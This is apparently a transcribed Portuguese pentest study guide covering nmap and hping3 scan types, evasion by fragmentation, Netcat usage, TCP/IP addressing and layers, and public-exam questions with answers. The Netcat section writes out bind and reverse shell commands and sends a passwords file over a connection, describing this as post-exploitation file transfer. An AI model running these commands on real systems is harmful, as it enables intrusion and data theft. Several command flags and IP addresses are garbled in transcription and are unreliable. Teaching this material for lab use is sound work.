Verificando o status das portas dos hosts

Transcrição

1 Verificando o status das portas dos hosts Depois de ter localizado sistemas ativos em uma rede, é hora de dar uma olhada nesses hosts para determinar se existem portas abertas que podem ser úteis. Essencialmente o que estamos fazendo em cada host vivo é mexer as maçanetas em cada porta para ver quais portas estão abertas e fechadas. E enquanto podemos estar vendo que estão abertos e fechados, ainda não estamos no ponto em que estamos espiando o que tem dentro. Você deve saber como as varreduras de portas funcionam e os diferentes tipos de varredura disponíveis, bem como por que você usaria um tipo e não o outro. Preste muita atenção aos scans mencionados aqui, porque cada um tem pequenos detalhes que você pode esquecer. Lembre-se também de estudar, estudar, estudar essas varreduras. Antes de começar a executar alguns scan de portas, vamos rever alguns fundamentos. Se você se lembrar, TCP é um protocolo orientado a conexão e UDP é sem conexão. Saber como esses protocolos funcionam e o significado de cada um vai fazer e escolher a varredura correta, vai ser muito mais fácil para você e definitivamente mais produtivo. O handshake de três vias (3-way-handshake) é executado quando você está tentando estabelecer uma conexão TCP com um sistema ou, especificamente, uma porta no sistema. O handshake estabelece uma conexão bem-sucedida e confiável entre dois sistemas. O processo envolve três etapas:

2 3-way-handshake Vejamos os passos: Hosta A envia o pacote SYN para o host B com uma solicitação para estabelecer conexão; Host B responde com um pacote SYN-ACK como um reconhecimento da solicitação; Host A responde com um ACK, que serve para estabelecer por completo a conexão. Se estes três passos acontecerem sem erro, uma conexão é estabelecida com sucesso e as informações irão fluir por ela. SYN e ACK são dois dos indicadores em um pacote conhecido como sinalizadores. Esses sinalizadores são essencialmente bits que são definidos como on ou off no cabeçalho de um pacote TCP. O sistema receptor usará esses sinalizadores para determinar como processar esse pacote específico. Em um pacote TCP é possível ter cada pacote ativado ou cada pacote desligado, com qualquer variação de ligar e desligar permitido na maioria dos casos. Esta informação básica é vital para você a partir deste ponto, porque ele terá um impacto direto sobre a utilidade do

3 seu processo de scanning. SYN inicia uma conexão entre dois hosts para facilitar a comunicação; ACK reconhece o pacote recebido; URG indica que um dado de um pactoe é urgente e deve ser processado imediatamente; PSH instrui o sistema remetente para enviar todos os dados em buffer imediatamente; FIN avisa ao sistema remoto que nenhuma informação a mais será enviada, ou seja, ele encerra a conexão de forma simples. RST reseta a conexão. Esta informação pode ser útil em várias áreas, especialmente quando você está usando um montador de pacotes. Você pode usar um montador de pacotes e usar as flags para identificar como um sistema responde ao pacote e que tipo de resultado ocorre. Veremos como usar isto com o hping2 e hping3. No hping3, por exemplo, é possível gerar diferentes tipos de pacotes e enviar para o alvo: 1. Criar um pacote ACK e enviar para a porta 80 do alvo: hping3 A <target IP address> -p Criar um SYN scan em diversas portas da vítima: hping s <target IP address> -v 3. Criar um pacote com FIN, URG e PSH e enviar para a porta 80 da vítima: hping3 F P -U <target IP address> -p 80

4 Os tipos de scans Full-Open Scan Este tipo de scan cria a conexão completa com o 3-wayhandshake. A vantagem é que você tem uma resposta positiva do sistema alvo. Em um pentest ele pode ocorrer de propósito ou sem querer, mas isto pode ser ruim ou até mesmo fatal para o teste, pois o ataque poderá ser logado pelo firewall e um IDS. Quando uma porta fechada é encontrada, a resposta do host remoto será o sinalizador RST, finalizando a tentativa de conexão. No nmap, podemos usar a flag -st que significa scan TCP : nmap -st <range ou endereço IP> Tenha em mente que este tipo de scan causa muito barulho na rede e com certeza será logado. Use-o somente quando nenhum outro scan funcionar ou simplesmente for necessário. Stealth / Half-Open Scan Neste, o processo é semelhante ao full-open scan, mas faz menos barulho. Também é chamado de SYN scan. Enquanto no full-open o processo de 3-way-handshake finaliza com ACK, no half-open é finalizado com uma resposta RST, o que significa que o host atacante não quer se conectar com o host remoto. Com isto, temos a resposta de que a porta está disponível mas não estabelecemos uma conexão, de fato. Como este scan não recebe o ACK final, ele é menos confiável. Caso a porta esteja fechada, a conexão inicia com SYN e terá a resposta com um RST.

5 Half-open scan Para fazer este scan no nmap, use o comando: nmap ss <range / endereço IP> Xmas Tree Scan Este scan vem de uma frase em inglês lit up like a Christmas (Xmas) tree (iluminado como uma árvore de natal), pois fala a respeito da quantidade de sinalizadores enviados, que são os URG, PSH e FIN ligados. Ao enviar isto, o sistema remoto irá determinar o que fazer, que deveria ser dar um drop no pacote ou ignorar, mas alguns deles respondem com a porta aberta ou com o RST, informando que a porta está fechada.

6 Xmas tree scan Para fazer isto no nmap: nmap sx v <range ou endereço IP> FIN Scan Neste scan, o atacante envia para a vítima um pacote com o sinalizador FIN. Ele tem um perfil mais baixo, o que pode passar pelo firewall e chegar ao sistema alvo. Semelhante ao Xmas tree scan, se um FIN é enviado para uma porta aberta, não teremos resposta, mas se a porta estiver fechada, a vítima responderá com um RST. FIN scan No nmap temos o seguinte comando: nmap sf <range ou endereço IP> NULL Scan Neste scan, o atacante envia para a vítima um pacote sem um flag. O resultado é similar ao FIN scan. A vítima irá responder de acordo com a porta aberta ou fechada. Ou seja, ao enviar para uma porta aberta, não teremos resposta, mas se enviar para uma porta fechada, teremos o RST.

7 NULL Scan No nmap temos o seguinte comando: nmap sn <range ou endereço IP> Na prática, este é um tipo de ataque fácil de perceber, pois não existe motivos para um pacote ser enviado sem nenhum sinalizador. Logo, os administradores de redes devem ficar atentos a estes tipos de pacotes quando trafegarem na rede e forem detectados por seus sistemas. Idle Scanning É um tipo de scan muito único e poderoso por ser muito discreto em relação aos outros scans, mas depende de como você faz o scan. A intenção aqui é enviar os pacotes sem parecer que estão saindo do sistema remetente. Na prática, ele é feito a partir de máquinas de salto (ou zumbis) até o sistema alvo. Caso o defensor vá investigar a origem, ele apontará para a máquina de salto e não para a máquina de origem de fato. Ela é mais complexa de ser feita em relação as outras técnicas, pois depende de três pontos: Um meio de determinar se uma porta TCP está aberta é enviar um pacote SYN para a porta. A máquina de destina responderá com um pacote SYN/ACK se a porta estiver aberta, e com RST se estiver fechada;

8 Uma máquina que recebe um pacote SYN/ACK não solicitado, vai responder com um RST. Um RST não solicitado será ignorado; Cada pacote IP na Internet tem um número de identificação de fragmento (IP ID).Uma vez que muitos sistemas operacionais simplesmente incrementam esse número para cada pacote que enviam, a detecção do ID IP pode informar um invasor quantos pacotes foram enviados desde a última sondagem. É através da aplicação e combinação dessas propriedades que o atacante pode falsificar sua identidade e lançar a culpa em outro sistema, que neste caso é o zumbi. Para um observador externo, o zumbi vai parecer o criador do ataque. Um idle scan consiste em três etapas que seriam repetidas para cada porta a ser verificada: Verifique o IP ID da máquina zumbi e grave-o; Forge um pacote SYN do zumbi e envie para a porta desejada no destino. Dependendo do estado da porta, a reação do alvo pode ou não fazer com que o ID do zumbi seja incrementado; Verifique o ID IP do zumbi outra vez. O estado da porta de destino é então determinado comparando este novo ID IP com o registrado na etapa 1. Após esse processo, o ID IP do zumbi deve ter incrementado por um valor de um ou dois. Um aumento de um indica que o zumbi não enviou nenhum pacote, exceto por sua resposta à sonda do atacante. Essa falta de pacotes enviados significa que a porta não está aberta (o alvo deve ter enviado ao zumbi um pacote RST, que foi ignorado ou aconteceu nada mesmo). Um aumento de dois indica que o zumbi enviou um pacote entre as duas sondas. Este pacote extra normalmente significa que a porta está aberta (o alvo presumivelmente enviou o zumbi um pacote SYN / ACK em resposta ao SYN forjado, que induziu um pacote RST do zumbi). Aumentos

9 maiores do que dois geralmente significam um host zumbi ruim. Pode não ter números de ID IP previsíveis, ou pode estar envolvido em comunicação não relacionada ao idle scan. Mesmo que o que acontece com uma porta fechada é ligeiramente diferente do que acontece com uma porta filtrada, o atacante mede o mesmo resultado em ambos os casos, ou seja, um ID IP acrescido em um. Portanto, não é possível para o idle scan distinguir entre portas fechadas e filtradas. Quando o nmap registra um aumento de ID IP em um, ele marca a porta fechada filtrada. A vantagem deste scan é que você consegue se manter discreto em relação aos sistemas de detecção e firewalls, mas por outro lado, o tempo para conseguir executar este scan irá crescer bastante. ACK Scanning Alguns dos scans podem fazer com que você seja bloqueado, provavelmente existe um firewall no meio do caminho. Então o que fazer? Este firewall, provavelmente, deve ser stateful, ou seja, ele inspeciona o estado do pacote durante as conexões de rede. Eles foram feitos para identificar diferentes tipos de conexões, entre legítimos ou não. Qualquer pacote diferente do que ele conhece será dropado e o host não poderá passar. O ACK scan foi feito para detectar a presença de firewall stateful. No modo normal, um pacote ACK só seria enviado em resposta a uma conexão sendo estabelecida em alguma conexão TCP existente. Caso um pacote com ACK passe e não existe uma conexão estabelecida, ele não deveria passar. Quando este scan é realizado e um ACK é enviado para um alvo, os resultados irão nos dizer o que queremos saber (esperamos). Quando um ACK é capaz de fazê-lo todo o caminho para o seu destino, um pacote RST será retornado se a porta está aberta ou fechada (é porque um RST é retornado para ambas as portas

10 abertas e fechadas que esta varredura não é usado para detectar o estado real das portas). Também é possível que, se um ACK atinge seu destino, então um scanner como nmap retornará uma mensagem informando que a porta não está filtrada. Se o destino não puder ser alcançado pela mensagem ACK, nenhuma resposta será retornada, indicando que ele não atingiu seu destino pretendido. No caso do ACK não atingir o seu alvo, a outra resposta potencial pode vir na forma de uma mensagem de erro ICMP (tal como o tipo 3, código 0, 1, 2, 3, 9, 10 ou 13) ou é rotulada como Filtrada. Quando um scan é bloqueado Então, o que você faz como um pentester se filtros de pacotes, firewalls e outros dispositivos começam a pegar evidências de seu ataque? Muitos métodos estão disponíveis para evadir ou minimizar o risco de detecção durante o scan. Por exemplo, a fragmentação funciona rompendo um pacote em várias partes com o objetivo de impedir que os dispositivos de detecção vejam o que o pacote original não fragmentado pretende fazer. Pense nisso como tirar uma foto grande e cortá-la em pedaços como um quebra-cabeça. Se você não sabe o que o retrato original é você tem que remontar um grupo dos pedaços para saber o que ela é de fato. No nmap, se você deseja fragmentar um pacote, você pode fazer isso usando a opção -f da seguinte maneira: nmap ss T4 A f v <range ou endereço IP> Outras ferramentas que podem fragmentar pacotes são fragtest e fragroute. São usados através de linhas de comando, mas fazem a mesma coisa que outras ferramentas de fragmentação. UDP Scanning Tenha em mente que o UDP é um protocolo connectionless, diferente do TCP, que é baseado em conexão. UDP não possui

11 sinalizadores, logo você mudará a forma de pensar. No UDP, uma vez que um pacote deixa um sistema, este é o fim das coisas ou pelo menos fomos ensinados assim. Na realidade, quando um pacote UDP é enviado, nenhuma resposta é retornada se a porta no destino para o qual ele está sendo enviado está aberta. No entanto, se a porta estiver fechada, uma resposta será devolvida na forma de uma mensagem Port Unreachable. No nmap temos o seguinte comando: nmap su <range / endereço IP> Sugestão de Livro: Certified Ethical Hacker version 9: Study Guide. Sybex Netcat: O canivete suíço das conexões TCP/IP O Netcat é uma ferramenta versátil para testes de rede o qual permite ler e escrever dados através das conexões, usando o protocolo TCP/IP. Foi desenhado para ser uma ferramenta back-end confiável que pode ser usada diretamente ou de modo fácil por outros programas e scripts. Ao mesmo tempo, é cheia de funcionalidades de debugging e exploração, já que pode criar quase qualquer tipo de conexão que você possa precisar e tem diversas capacidades interessantes. Esta ferramenta provê acesso às principais funcionalidades:

12 Conexões de saída e entrada, TCP ou UDP, de ou para qualquer porta; Tem um modo de tunelamento que permite também um tunelamento espeicla como UDP para TCP, com a possibilidade de espeicificar todos os parâmetros de rede (porta de origem/interface, porta/interface ouvinte, e o host remoto permitido para conectar no túnel; Tem a funcionalidades de port scanning, de modo aleatório; Opções avançadas de uso como modo de envio buffered (uma linha a cada N segundos) e hexdump (para stderr ou para um arquivo específico) dos dados transmitidos ou recebidos; Parser e responder dos códigos RFC854 opcionais. No Kali, para vermos as opções do Netcat, devemos entrar com o comando nc -h, como pode ser visto abaixo:

13 Netcat Opção h Verificando se uma porta está ouvindo Vamos fazer o Netcat se conectar a uma porta para verificar se está aguardando alguma conexão. Vamos testar em um servidor web qualquer. Diga ao Netcat para usar a porta 80 e seja no modo verbose com a opção v. Se a porta estiver aberta, você um resultado semelhante a este: Netcat Verificando porta 80 aberta A partir deste comando, ele nos dá uma conexão TCP com o IP

14 informado. Tudo o que digitarmos e apertamos ENTER, será enviado para o servidor web. Obtendo informações do banner do servidor web Após abrir a conexão com o IP informado, digite HEAD / HTTP/1.0 e aperte ENTER algumas vezes para que o servidor responda com as informações que queremos. Netcat Obtendo banner do servidor web Aguardando uma conexão Você pode ficar escutando por uma conexão de entrada em uma porta através do comando nc -lvp 1234, onde o parâmetros l (listen), v (verbose) e p (port). Abra outro terminal e utilize o comando nc para se conectar e digite qualquer mensagem e aperte ENTER. Você verá que a outra janela do terminal receberá a mensagem.

15 Netcat Ouvindo conexão em uma porta Ouvindo um Command Shell Quando você configura o Netcat para ouvir, use também o parâmetro -e para dize-lo para executar o /bin/bash (ou para iniciar um prompt de comando Bash) quando receber a conexão. Isto permite que qualquer um que se conecte como ouvinte para executar os comandos em seu sistema: Netcat Ouvindo conexão com command shell Em uma segunda tela do terminal, faça a conexão novamente e execute alguns comandos linux como se estivesse no terminal do seu alvo:

16 Netcat Abrindo command shell Este exemplo foi feito na mesma máquina, mas ela pode ser feita entre máquinas diferentes. Tente isto com duas máquinas virtuais em seu próprio lab. Empurrando um Command Shell de volta para o ouvinte Para fazermos isto, vamos configurar nosso primeiro terminal para ouvir na porta 1234, mas sem o parâmetro -e neste momento. root@kali:~# nc -lvp 1234 listening on [any] Agora abra um segundo terminal e se conecte no Netcat ouvinte que acabamos de criar: root@kali:~# nc e /bin/bash A conexão é feita normalmente, mas apenas utilizamos o parâmetro -e para executar o /bin/bash. Volte para o primeiro terminal para ver a conexão, e se você usar comandos do terminal, você verá eles sendo executados. listening on [any] connect to [ ] from (UNKNOWN) [ ] 51921

17 whoami root Agora, ao invés de produzir uma saída do que vem do ouvinte para a tela, use o > para enviar para um arquivo: root@kali:~# nc -lvp 1234 > netcatfile listening on [any] No segundo terminal que configurou a conexão Netcat, mas desta vez utilize o símbolo < para dizer para ele enviar o contéudo do arquivo através da conexão Netcat. Espere alguns segundos para ele transferir e veja o conteúdo do arquivo criado em sua primeira instância. O resultado deve ser semelhante a isto: root@kali:~# nc < senhas.txt Você usou o Netcat para transferir um arquivo. Neste caso foi apenas um exemplo simples, mas imagine o que pode ser feito para transferir arquivos de um sistema explorado. Esta técnica é muito utilizada na fase pós-exploratória do pentest, desde que você tenha acesso ao sistema. Fonte: Weidman, Georgia. Penetration Testing: A Hands-On Introduction to Hacking Mapa Mental de Redes de Computadores Camadas TCP/IP Mapa Mental de Redes de Computadores Camadas TCP/IP Mapa Mental de Redes de Computadores Camadas TCP/IP

18 Arquitetura e Protocolos TCP/IP O conjunto de protocolos TCP/IP foi projetado especialmente para ser o protocolo utilizado na Internet. Sua característica principal é o suporte direto a comunicação entre redes de diversos tipos. Neste caso, a arquitetura TCP/IP é

19 independente da infra-estrutura de rede física ou lógica empregada. De fato, qualquer tecnologia de rede pode ser empregada como meio de transporte dos protocolos TCP/IP, como será visto adiante. Endereçamento IP Existem duas versões dos protocolo IP: IPV4 e IPV6. A primeira é utilizada atualmente e está se esgotando devido a quantidade devido ao número de máquinas conectadas na Internet utilizando-o. Já o IPV6 está vindo para solucionar esse problema de escassez, sendo uma versão melhorada. IPV4 Os endereços IP são compostos por 4 blocos de 8 bits (32 bits), sendo representados de 0 a 255, ou seja, as 256 possibilidades dos 8 bits. Cada bloco é chamado de octeto. A sua utilização em octetos é apenas para facilitar a visualização, mas quando processados, são apenas números binários. Total de endereços IP é de Existem algumas faixas de IP que são reservadas para redes locais, que são as que iniciam da seguinte forma: 10.x.x.x x.x x.x até x.x O endereço IP é formado por duas informações principais: o endereço de rede e o endereço de host dentro da rede. Veja o exemplo do IP , onde o primeiro octeto, o 10, é o endereço de rede, já o segundo até o quarto octeto é o endereço de host. Outro exemplo seria o IP , onde é o endereço de rede e é o endereço de host.

20 Existe também algumas regras quanto a validade de um IP, sendo os listados abaixo como inválidos: 0.xxx.xxx.xxx Nenhum IP pode começar com zero. Somente utilizado é para responder às requisições DHCP de uma máquina que entrou na rede; 127.xxx.xxx.xxx Chamado de loopback. Seria o endereço reservado para testes e para interface chamada de loopback, ou seja, a própria máquina. 255.xxx.xxx.xxx, xxx , xxx.xxx Nenhum identificador de rede pode ser 255 e nenhum endereço de host pode ser composto apenas de endereços 255, independente de classe do endereço. xxx.0.0.0, xxx.xxx.0.0 Nenhum identificador de host pode ser composto apenas de zeros, pois são endereços reservados da rede. xxx.xxx.xxx.255, xxx.xxx.xxx.0 Nenhum endereço de classe C pode terminar com 0 ou 255, pois são utilizados para envio de pacotes broadcast. Classes de Endereçamento IP Inicialmente os endereços IP foram divididos em classes que reservam um número diferente de octetos para o endereçamento da rede, sendo elas chamadas de A, B, C, D e E. Dentre elas, apenas as classes A, B e C são utilizadas realmente, pois a D e E são para utilização futura. Veja abaixo a separação das classes: Classe A: Com tamanho de 8 bits no endereço de rede; Tamanho de 24 bits para endereços de hosts; O primeiro octeto decimal entre 1 e 126; Utiliza máscara de rede ; Total de redes de = 126; Total de hosts de = ; Classe B:

21 Com tamanho de 16 bits no endereço de rede; Tamanho de 16 bits para endereços de hosts; O primeiro octeto decimal entre 128 e 191; Utiliza máscara de rede ; Total de redes de = ; Total de hosts de = ; Classe C: Com tamanho de 24 bits no endereço de rede; Tamanho de 8 bits para endereços de hosts; O primeiro octeto decimal entre 192 e 223; Utiliza máscara de rede ; Total de redes de = ; Total de hosts de = 254; Classe D: Reservado para multicasting; Sendo o primeiro octeto decimal entre 224 e 239; Classe E: Reservado para pesquisas; Sendo o primeiro octeto decimal entre 240 e 247; IPV6 Como já falei anteriormente, o IPV6 veio para resolver o problema da escassez de endereços IP do IPV4. Os endereços IP são compostos por 8 blocos de 4 caracteres do sistema hexadecimal em cada bloco, ou seja, 16 caracteres, totalizando 128 bits, sendo representados de 0 à F, ou seja, as 16 possibilidades para cada caracter. Cada bloco é chamado de octeto. A sua utilização em octetos é apenas para facilitar a visualização, mas quando processados, são apenas números binários. Total de endereços IP é de Veja um exemplo de endereço: 2001:247f:6c24:17da:cd89:d4e2:bcd7:a36e

22 Algumas outras características: Autoconfiguração do endereço, não sendo mais necessário o uso do DHCP; Endereçamento hierárquico, o que simplifica as tabelas de encaminhamento das tabelas dos roteadores da rede, o que diminui a carga de processamento deles; O cabeçalho foi totalmente remodelado; Cabeçalhos de extensão para guardar detalhes adicionais; Suporte a qualidade diferenciada para conexões diferenciadas para áudio e vídeo; Capacidade de extensão, podendo adicionar novas especificações de forma simples; Encriptação. Suporte a extensões que permitem opções de segurança. Um detalhe curioso sobre o endereçamento no IPV6 é a sua capacidade de ser encurtado. Veja o seguinte exemplo de endereço: 2001:247f:0000:0000:cd89:d4e2:bcd7:a36e. Onde tem os blocos com 0000, podemos simplesmente substituir por um único zero, ficando 2001:247f:0:0:cd89:d4e2:bcd7:a36e ou até mesmo 2001:247f::cd89:d4e2:bcd7:a36e Pode-se ainda: Utilizar letras minúsculas e maiúsculas; Utilizar as regras de abreviação, como omitir zeros à esquerda e representar zeros contínuos por :: Tipos de endereços Unicast O endereço identifica apenas uma interface de rede. Desse modo, um pacote enviado a um endereço unicast é entregue a uma única interface. Cada endereço IPv4 unicast inclui uma ID de rede e uma ID de host.

23 Unicast Multicast Multicast é a entrega de informação para múltiplos destinatários simultaneamente usando a estratégia mais eficiente onde as mensagens só passam por um link uma única vez e somente são duplicadas quando o link para os destinatários se divide em duas direções. Multicast Anycast Um pacote destinado a um endereço multicast é enviado para todas as interfaces do grupo, mas somente um deles é escolhido. Há também uns um-à-muitos associação entre endereços de rede e endpoints de rede: cada endereço de destino identifica um jogo de endpoints do receptor, mas somente um deles é escolhido em todo o tempo dado para receber

24 a informação de qualquer remetente dado. Anycast Broadcast Permite que a informação seja enviada para todas as maquinas de uma LAN, MAN, WAN e TANS, redes de computadores e sub-redes. Broadcast Camadas TCP/IP TCP/IP é um acrônimo para o termo Transmission Control Protocol/Internet Protocol Suite, ou seja é um conjunto de

25 protocolos, onde dois dos mais importantes (o IP e o TCP) deram seus nomes à arquitetura. O protocolo IP, base da estrutura de comunicação da Internet é um protocolo baseado no paradigma de chaveamento de pacotes (packet-switching). Os protocolos TCP/IP podem ser utilizados sobre qualquer estrutura de rede, seja ela simples como uma ligação ponto-aponto ou uma rede de pacotes complexa. Como exemplo, pode-se empregar estruturas de rede como Ethernet, Token-Ring, FDDI, PPP, ATM, X.25, Frame-Relay, barramentos SCSI, enlaces de satélite, ligações telefônicas discadas e várias outras como meio de comunicação do protocolo TCP/IP. A arquitetura TCP/IP, assim como OSI realiza a divisão de funções do sistema de comunicação em estruturas de camadas. Em TCP/IP as camadas são: Aplicação Transporte Inter-Rede Rede Modelo OSI e TCP/IP Vamos analisar cada uma das camadas da Arquitetura TCP/IP e vamos falar sobre os protocolos que são utilizados em cada uma

26 delas. 1- Camada Física / Enlace / Host / Rede A camada de rede é responsável pelo envio de datagramas construídos pela camada Inter-Rede. Esta camada realiza também o mapeamento entre um endereço de identificação de nível Inter-rede para um endereço físico ou lógico do nível de Rede. A camada Inter-Rede é independente do nível de Rede. Também chamada camada de abstração de hardware, tem como função principal à interface do modelo TCP/IP com os diversos tipos de redes (X.25, ATM, FDDI, Ethernet, Token Ring, Frame Relay, sistema de conexão ponto-a-ponto SLIP, etc.). Como há uma grande variedade de tecnologias de rede, que utilizam diferentes velocidades, protocolos, meios transmissão, etc. esta camada não é normatizada pelo modelo, o que provê uma das grandes virtudes do modelo TCP/IP: a possibilidade de interconexão e interoperação de redes heterogêneas. Os protocolos existentes nesta camada são: Protocolos com estrutura de rede própria (X.25, Frame- Relay, ATM) Protocolos de Enlace OSI (PPP, Ethernet, Token-Ring, FDDI, HDLC, SLIP, ) Protocolos de Nível Físico (V.24, X.21) Protocolos de barramento de alta-velocidade (SCSI, HIPPI, ) Protocolos de mapeamento de endereços (ARP Address Resolution Protocol) Este protocolo pode ser considerado também como parte da camada Inter-Rede. 2-Camada de Rede / Inter-Rede /

27 Internet Esta camada realiza a comunicação entre máquinas vizinhas através do protocolo IP. Para identificar cada máquina e a própria rede onde estas estão situadas, é definido um identificador, chamado endereço IP, que é independente de outras formas de endereçamento que possam existir nos níveis inferiores. No caso de existir endereçamento nos níveis inferiores é realizado um mapeamento para possibilitar a conversão de um endereço IP em um endereço deste nível. Os protocolos existentes nesta camada são: Protocolo de transporte de dados: IP Internet Protocol; Protocolo de controle e erro: ICMP Internet Control Message Protocol; Protocolo de controle de grupo de endereços: IGMP Internet Group Management Protocol; Protocolos de controle de informações de roteamento como BGP, OSPF e o RIP; Protocolo ARP Address Resolution Protocol Permite certo computador se comunicar com outro computador em rede quando somente o endereço de IP é conhecido pelo destinatário. Protocolo RARP Reverse Address Resolution Protocol Faz o contrario do protocolo ARP, ao invés de obter o endereço MAC da maquina, o protocolo RARP requisita o endereço de IP. O protocolo IP realiza a função mais importante desta camada que é a própria comunicação inter-redes. Para isto ele realiza a função de roteamento que consiste no transporte de mensagens entre redes e na decisão de qual rota uma mensagem deve seguir através da estrutura de rede para chegar ao destino. O protocolo IP utiliza a própria estrutura de rede dos níveis inferiores para entregar uma mensagem destinada a uma máquina

28 que está situada na mesma rede que a máquina origem. Por outro lado, para enviar mensagem para máquinas situadas em redes distintas, ele utiliza a função de roteamento IP. Isto ocorre através do envio da mensagem para uma máquina que executa a função de roteador. Esta, por sua vez, repassa a mensagem para o destino ou a repassa para outros roteadores até chegar no destino. 3-Camada de Transporte Esta camada reúne os protocolos que realizam as funções de transporte de dados fim-a-fim, ou seja, considerando apenas a origem e o destino da comunicação, sem se preocupar com os elementos intermediários. A camada de transporte possui dois protocolos que são o UDP (User Datagram Protocol) e TCP (Transmission Control Protocol). O protocolo UDP realiza apenas a multiplexação para que várias aplicações possam acessar o sistema de comunicação de forma coerente. O protocolo TCP realiza, além da multiplexação, uma série de funções para tornar a comunicação entre origem e destino mais confiável. São responsabilidades do protocolo TCP: o controle de fluxo, o controle de erro (checksum), a sequenciação e a multiplexação de mensagens. A camada de transporte oferece para o nível de aplicação um conjunto de funções e procedimentos para acesso ao sistema de comunicação de modo a permitir a criação e a utilização de aplicações de forma independente da implementação. Desta forma, as interfaces socket ou TLI (ambiente Unix) e Winsock (ambiente Windows) fornecem um conjunto de funções-padrão para permitir que as aplicações possam ser desenvolvidas independentemente do sistema operacional no qual rodarão.

29 4-Camada de Aplicação / Apresentação / Sessão A camada de aplicação reúne os protocolos que fornecem serviços de comunicação ao sistema ou ao usuário. Pode-se separar os protocolos de aplicação em protocolos de serviços básicos ou protocolos de serviços para o usuário: Protocolos de serviços básicos, que fornecem serviços para atender as próprias necessidades do sistema de comunicação TCP/IP: DNS, BOOTP, DHCP Protocolos de serviços para o usuário: FTP, HTTP, Telnet, SMTP, POP3, IMAP, TFTP, NFS, NIS, LPR, LPD, ICQ, RealAudio, Gopher, Archie, Finger, SNMP e outros Questões de Concursos (FGV 2010 CODESP-SP Analista de Sistemas Tipo 1) No que diz respeito ao Modelo de Referência OSI/ISO e arquitetura TCP/IP, são protocolos da camada de rede: a) IP, ARP e ICMP. b) TCP, RARP e IP. c) BGP, FTP e UDP. d) ICMP, UDP e FTP. e) ARP, TCP e RARP. (CESPE 2007 TRE-AP Técnico Judiciário Programação de Sistemas) Na arquitetura TCP/IP, entre os protocolos envolvidos na camada de rede encontram-se o IP e o a) TCP. b) UDP. c) RSTP. d) ICMP.

30 e) HTTP. (CESPE 2010 INMETRO Pesquisador Ciência da Computação) Para interligar LAN, ou segmentos de LAN, são utilizados dispositivos de conexão, que podem operar em diferentes camadas da arquitetura TCP/IP. Assinale a opção que indica o dispositivo que opera em todas as cinco camadas do modelo TCP/IP. a) Hub b) Gateway c) Bridge d) Roteador e) Switch (CESPE 2010 INMETRO Pesquisador Ciência da Computação) O único serviço que é realizado tanto pelo protocolo TCP quanto pelo protocolo UDP da camada de transporte da arquitetura TCP/IP é a) controle de fluxo. b) controle de envio. c) controle de congestionamento. d) controle de recebimento. e) checksum. (CESPE 2011 Correios Analista de Correios Engenheiro Engenharia de Redes e Comunicação) Julgue os seguintes itens com base no modelo de referência TCP/IP. Os serviços DNS são imprescindíveis para a comunicação em redes TCP/IP, já que, sem eles, a camada de rede se torna totalmente inoperante, fazendo que, em nenhuma situação, ocorra comunicação IP. ( ) Certo ( ) Errado (CESPE 2011 Correios Analista de Correios Analista de Sistemas Suporte de Sistemas) A camada física do protocolo TCP/IP mantém suporte a aplicações do usuário e interage com vários programas, para que estes se comuniquem via rede. ( ) Certo ( ) Errado

31 (FCC 2010 TCE-SP Agente da Fiscalização Financeira Informática Produção e Banco de Dados) Pela ordem, da mais baixa (1ª) até a mais alta (4ª), as camadas do modelo de referência TCP/IP são a) Inter-redes, Rede, Transporte e Sessão. b) Inter-redes, Host/rede, Transporte, e Aplicação. c) Inter-redes, Transporte, Sessão e Aplicação. d) Host/rede, Inter-redes, Transporte e Sessão. e) Host/rede, Inter-redes, Transporte e Aplicação. (CESPE 2011 Correios Analista de Correios Analista de Sistemas Suporte de Sistemas) A camada de aplicação na arquitetura TCP/IP equivale às camadas de aplicação, apresentação e sessão da arquitetura OSI. ( ) Certo ( ) Errado (FCC 2011 TRT 24ª REGIÃO (MS) Analista Judiciário Tecnologia da Informação) São protocolos da camada 3 (rede, inter-redes ou internet) do modelo TCP/IP de cinco camadas: a) IPSec e DNS. b) SMTP e TCP. c) Wi-Fi e SMTP. d) SNMP e TCP. e) IPSec e ICMP. (IPAD 2010 Prefeitura de Goiana PE Administrador de Redes 1) Os protocolos da arquitetura TCP/IP são organizados em camadas. Acerca desse assunto, analise as seguintes afirmativas: 1. A camada física está relacionada a características elétricas e mecânicas do meio de transmissão. 2. Os protocolos TCP e UDP fazem parte da camada de rede. 3. Os protocolos HTTP e FTP fazem parte da camada de transporte. Assinale a alternativa correta: a) Apenas uma das afirmativas é falsa. b) Apenas as afirmativas 1 e 2 são falsas. c) Apenas as afirmativas 1 e 3 são falsas.

32 d) Apenas as afirmativas 2 e 3 são falsas. e) As afirmativas 1, 2 e 3 são falsas. Gabarito e Comentários das Questões (FGV 2010 CODESP-SP Analista de Sistemas Tipo 1) No que diz respeito ao Modelo de Referência OSI/ISO e arquitetura TCP/IP, são protocolos da camada de rede: Letra A. Veja aqui mesmo no artigo, onde informo os protocolos utilizados na camada de rede: IP, ARP, RARP, ICMP, IGMP. Uma outra dica pra resolver essa questão era só lembrar que o protocolo TCP e UDP fazem parte da camada de Transporte, e por eliminação nos restaria a nossa resposta. (CESPE 2007 TRE-AP Técnico Judiciário Programação de Sistemas) Na arquitetura TCP/IP, entre os protocolos envolvidos na camada de rede encontram-se o IP e o Letra D. Praticamente serve a mesma explicação da questão acima. (CESPE 2010 INMETRO Pesquisador Ciência da Computação) Para interligar LAN, ou segmentos de LAN, são utilizados dispositivos de conexão, que podem operar em diferentes camadas da arquitetura TCP/IP. Assinale a opção que indica o dispositivo que opera em todas as cinco camadas do modelo TCP/IP. Letra B. O Hub trabalha na camada Física/Enlace. Switch na camada de Enlace, porque trabalha com o endereço MAC. Os Switch Layer 3 e Roteadores trabalham com o IP na camada de Rede.

